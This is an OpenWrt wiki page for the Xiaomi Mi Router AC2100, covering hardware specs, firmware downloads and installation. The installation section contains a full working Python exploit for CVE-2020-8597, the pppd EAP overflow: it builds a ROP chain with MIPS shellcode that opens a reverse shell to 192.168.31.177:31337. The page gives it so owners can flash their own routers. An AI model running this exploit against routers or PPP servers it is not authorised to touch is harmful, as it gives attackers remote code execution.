Show pagesourceOld revisionsBacklinksBack to top × Table of Contents Xiaomi Mi Router AC2100 Supported Versions Experimental Versions Hardware Highlights Installation Backport build Upgrading OpenWrt LuCI Web Upgrade Process Terminal Upgrade Process Debricking Failsafe mode Basic configuration Specific Configuration Network interfaces Switch Ports (for VLANs) Buttons Hardware Info Photos Opening the case Serial JTAG Bootloader mods Hardware mods Bootlogs OEM bootlog OpenWrt bootlog Notes Tags Xiaomi Mi Router AC2100 Under Construction! This page is currently under construction. You can edit the article to help completing it. The Xiaomi Mi Router AC2100 is a wireless router with MT7621 platform. From a technical standpoint, the spec of Xiaomi Mi Router AC2100 is highly identical to Redmi AC2100. It runs Xiaomi Router firmware by default and similarly, it requires a simple PPPOE exploit to start a shell and flash OpenWRT via command line interface. Support Forums https://forum.openwrt.org/t/new-xiaomi-router-ac2100 Supported Versions BrandModelVersionCurrent ReleaseOEM InfoForum SearchTechnical DataXiaomiMi Router AC2100snapshothttps://www.mi.com/miwifiacMi Router AC2100View/Edit data Experimental Versions None at this time. Hardware Highlights ModelVersionSoCCPU MHzFlash MBRAM MBWLAN HardwareWLAN2.4WLAN5.0100M portsGbit portsModemUSBMi Router AC2100MediaTek MT7621A880128NAND128MediaTek MT7603, MediaTek MT7615b/g/na/n/ac-4-- Installation ModelVersionCurrent ReleaseFirmware OpenWrt snapshot InstallFirmware OpenWrt snapshot UpgradeFirmware OEM StockMi Router AC2100snapshothttp://downloads.openwrt.org/snapshots/targets/ramips/mt7621/openwrt-ramips-mt7621-xiaomi_mi-router-ac2100-squashfs-kernel1.bin, http://downloads.openwrt.org/snapshots/targets/ramips/mt7621/openwrt-ramips-mt7621-xiaomi_mi-router-ac2100-squashfs-rootfs0.binhttp://downloads.openwrt.org/snapshots/targets/ramips/mt7621/openwrt-ramips-mt7621-xiaomi_mi-router-ac2100-squashfs-sysupgrade.binhttp://miwifi.com/miwifi_download.html Backport build unofficial stable build (scp07 Build) firmware source . Software Preparation Two ethernet cables Python 3 installed on your PC Download OpenWrt firmware from this page A script that implements CVE-2020-8597 (see below) An POC of CVE-2020-8597, from GitHub Gist You need to change the interface to match the name of the interface connected to the Xiaomi router. Also, change the (beginning of) MAC address on the line if src.startswith(“88:c3:97”) to match your router. The full MAC address of the router is on a sticker attached to the router. There's a good AC2100-OpenWRT-Guide at GitHub with pictures to explain the installation procedure. from scapy.all import * from socket import * interface = "enp0s31f6" def mysend(pay,interface = interface): sendp(pay, iface = interface) def packet_callback(packet): global sessionid, src, dst sessionid = int(packet['PPP over Ethernet'].sessionid) dst = (packet['Ethernet'].dst) src = (packet['Ethernet'].src) # In case we pick up Router -> PPPoE server packet if src.startswith("88:c3:97") : src,dst = dst,src print("sessionid:" + str(sessionid)) print("src:" + src) print("dst:" + dst) def eap_response_md5(): md5 = b"\x01\x02\x03\x04\x05\x06\x07\x08\x09\x0A\x0B\x0C\x0D\x0E\x0F\x10" # Reverse shell, connect to 192.168.31.177:31337 stg3_SC = b"\xff\xff\x04\x28\xa6\x0f\x02\x24\x0c\x09\x09\x01\x11\x11\x04\x28" stg3_SC += b"\xa6\x0f\x02\x24\x0c\x09\x09\x01\xfd\xff\x0c\x24\x27\x20\x80\x01" stg3_SC += b"\xa6\x0f\x02\x24\x0c\x09\x09\x01\xfd\xff\x0c\x24\x27\x20\x80\x01" stg3_SC += b"\x27\x28\x80\x01\xff\xff\x06\x28\x57\x10\x02\x24\x0c\x09\x09\x01" stg3_SC += b"\xff\xff\x44\x30\xc9\x0f\x02\x24\x0c\x09\x09\x01\xc9\x0f\x02\x24" stg3_SC += b"\x0c\x09\x09\x01\x79\x69\x05\x3c\x01\xff\xa5\x34\x01\x01\xa5\x20" stg3_SC += b"\xf8\xff\xa5\xaf\x1f\xb1\x05\x3c\xc0\xa8\xa5\x34\xfc\xff\xa5\xaf" stg3_SC += b"\xf8\xff\xa5\x23\xef\xff\x0c\x24\x27\x30\x80\x01\x4a\x10\x02\x24" stg3_SC += b"\x0c\x09\x09\x01\x62\x69\x08\x3c\x2f\x2f\x08\x35\xec\xff\xa8\xaf" stg3_SC += b"\x73\x68\x08\x3c\x6e\x2f\x08\x35\xf0\xff\xa8\xaf\xff\xff\x07\x28" stg3_SC += b"\xf4\xff\xa7\xaf\xfc\xff\xa7\xaf\xec\xff\xa4\x23\xec\xff\xa8\x23" stg3_SC += b"\xf8\xff\xa8\xaf\xf8\xff\xa5\x23\xec\xff\xbd\x27\xff\xff\x06\x28" stg3_SC += b"\xab\x0f\x02\x24\x0c\x09\x09\x01" reboot_shell = b"\x23\x01\x06\x3c" reboot_shell += b"\x67\x45\xc6\x34" reboot_shell += b"\x12\x28\x05\x3c" reboot_shell += b"\x69\x19\xa5\x24" reboot_shell += b"\xe1\xfe\x04\x3c" reboot_shell += b"\xad\xde\x84\x34" reboot_shell += b"\xf8\x0f\x02\x24" reboot_shell += b"\x0c\x01\x01\x01" #Debug sleep #s0 = b"\x00\x00\x00\x00" #s1 = b"\x40\x61\xF1\x77" # uclibc sleep() base + 0x6c140 = 77F16140 #s2 = b"\x03\x00\x00\x00" #s3 = b"\x01\x00\x00\x00" #s4 = b"\x0c\x93\x40\x00" #s5 = b"\x00\x00\x00\x00" #Debug reboot #s0 = b"\x00\x00\x00\x00" #s1 = b"\xB0\x9B\xEB\x77" # uclibc reboot(s2) base + 0xfbb0 = 77EB9BB0 #s2 = b"\x67\x45\x23\x01" #s3 = b"\x01\x00\x00\x00" #s4 = b"\x0c\x93\x40\x00" #s5 = b"\x00\x00\x00\x00" #ra = b"\x04\xdb\x40\x00" # 0x0040db04 : move $a0, $s2 ; move $t9, $s1 ; jalr $t9 s0 = b"\x40\x61\xF1\x77" # uclibc sleep() base + 0x6c140 = 77F16140 s1 = b"\x01\x00\x00\x00" s2 = b"\x41\x41\x41\x41" s3 = b"\x00\x64\xFF\x7F" # 7ffd6000-7fff7000 rwxp 00000000 00:00 0 [stack] s4 = b"\x88\xe1\x40\x00" # pppd.txt:0x0040e188 s5 = b"\x00\x00\x00\x00" ra = b"\x0C\x81\xF1\x77" # libuClibc.txt:0x0006e10c 77F1810C rop_chain = (b'A' * 0x184) rop_chain += s0 rop_chain += s1 rop_chain += s2 rop_chain += s3 rop_chain += s4 rop_chain += s5 rop_chain += ra # Nop slide rop_chain += (b'\x00' * 0x100) # Small reboot shellcode for testing #rop_chain += reboot_shell rop_chain += stg3_SC # Just padding the end a little, since the last byte gets set to 0x00 and not everyone uses a 4 * 0x00 as nop rop_chain += (b'\x00' * 0x4) pay = Ether(dst=dst,src=src,type=0x8864)/PPPoE(code=0x00,sessionid=sessionid)/PPP(proto=0xc227)/EAP_MD5(id=100,value=md5,optional_name=rop_chain) mysend(pay) if __name__ == '__main__': sniff(prn=packet_callback,iface=interface,filter="pppoes",count=1) eap_response_md5() Enter values for “FILL-IN” below Bootloader tftp server IPv4 address FILL-IN Bootloader MAC address (special) FILL-IN Firmware tftp image Latest OpenWrt release (NOTE: Name must contain “tftp”) TFTP transfer window FILL-IN seconds TFTP window start approximately FILL-IN seconds after power on TFTP client required IP address FILL-IN Upgrading OpenWrt → generic.sysupgrade These are generic instructions. Update with your router's specifics. LuCI Web Upgrade Process Browse to http://192.168.1.1/cgi-bin/luci/mini/system/upgrade/ LuCI Upgrade URL Upload image file for sysupgrade to LuCI Wait for reboot Terminal Upgrade Process If you don't have a GUI (LuCI) available, you can alternatively upgrade via the command line. There are two command line methods for upgrading: sysupgrade mtd Note: It is important that you put the firmware image into the ramdisk (/tmp) before you start flashing. sysupgrade Login as root via SSH on 192.168.1.1, then enter the following commands: cd /tmp wget http://downloads.openwrt.org/snapshots/trunk/XXX/xxx.abc sysupgrade /tmp/xxx.abc mtd If sysupgrade does not support this router, use mtd. Login as root via SSH on 192.168.1.1, then enter the following commands: cd /tmp wget http://downloads.openwrt.org/snapshots/trunk/XXX/xxx.abc mtd write /tmp/xxx.abc linux && reboot Debricking → generic.debrick Failsafe mode → failsafe_and_factory_reset Basic configuration → Basic configuration After flashing, proceed with this. Set up your Internet connection, configure wireless, configure USB port, etc. Specific Configuration Please fill in real values for this device, then remove the EXAMPLEs Network interfaces The default network configuration is: Interface Name Description Default configuration br-lan EXAMPLE LAN & WiFi EXAMPLE 192.168.1.1/24 vlan0 (eth0.0) EXAMPLE LAN ports (1 to 4) EXAMPLE None vlan1 (eth0.1) EXAMPLE WAN port EXAMPLE DHCP wl0 EXAMPLE WiFi EXAMPLE Disabled Switch Ports (for VLANs) Please fill in real values for this device, then remove the EXAMPLEs Numbers 0-3 are Ports 1-4 as labeled on the unit, number 4 is the Internet (WAN) on the unit, 5 is the internal connection to the router itself. Don't be fooled: Port 1 on the unit is number 3 when configuring VLANs. vlan0 = eth0.0, vlan1 = eth0.1 and so on. Port Switch port Internet (WAN) EXAMPLE 4 LAN 1 EXAMPLE 3 LAN 2 EXAMPLE 2 LAN 3 EXAMPLE 1 LAN 4 EXAMPLE 0 Buttons → hardware.button on howto use and configure the hardware button(s). Here, we merely name the buttons, so we can use them in the above Howto. Please fill in real values for this device, then remove the EXAMPLEs The Xiaomi Xiaomi Mi Router AC2100 has the following buttons: BUTTON Event EXAMPLE Reset reset EXAMPLE Secure Easy Setup ses EXAMPLE No buttons at all. - Hardware Info This table is automatically generated, once the correct filters for Brand and Model are set. If you see “Nothing.” instead of a table, please edit this section and adjust the filters with the proper Brand and Model. Just try, it's easy. If you still don't see a table here, or a table filled with '¿': Is there already a Techdata page available for Xiaomi Xiaomi Mi Router AC2100 ? If not: Create one. If you see a table with the desired device data, everything is OK and you can delete this text and the <WRAP> that encloses it. If it still doesn't work: Don't panic, calm down, take a deep breath and contact a wiki admin (tmomas) for help. Nothing. Photos Front: Insert photo of front of the casing Back: Insert photo of back of the casing Backside label: Insert photo of backside label Opening the case Note: This will void your warranty! Describe what needs to be done to open the device, e.g. remove rubber feet, adhesive labels, screws, … To remove the cover and open the device, do a/b/c Main PCB: Insert photo of PCB Serial → port.serial general information about the serial port, serial port cable, etc. How to connect to the Serial Port of this specific device: Insert photo of PCB with markings for serial port Replace EXAMPLE by real values. Serial connection parameters for Xiaomi Xiaomi Mi Router AC2100 @@Version@@ EXAMPLE 115200, 8N1 JTAG → port.jtag general information about the JTAG port, JTAG cable, etc. How to connect to the JTAG Port of this specific device: Insert photo of PCB with markings for JTAG port Bootloader mods → bootloader Hardware mods None so far. Bootlogs OEM bootlog COPY HERE THE BOOTLOG WITH THE ORIGINAL FIRMWARE OpenWrt bootlog COPY HERE THE BOOTLOG ONCE OPENWRT IS INSTALLED AND RUNNING Notes Space for additional notes, links to forum threads or other resources. … Tags Add tags below, then remove this fixme. How to add tags EXAMPLETAG This website uses cookies. By using the website, you agree with storing cookies on your computer. Also you acknowledge that you have read and understand our Privacy Policy. If you do not agree leave the website.OKMore information about cookies EXAMPLETAG Last modified: 2020/12/17 06:47by lessload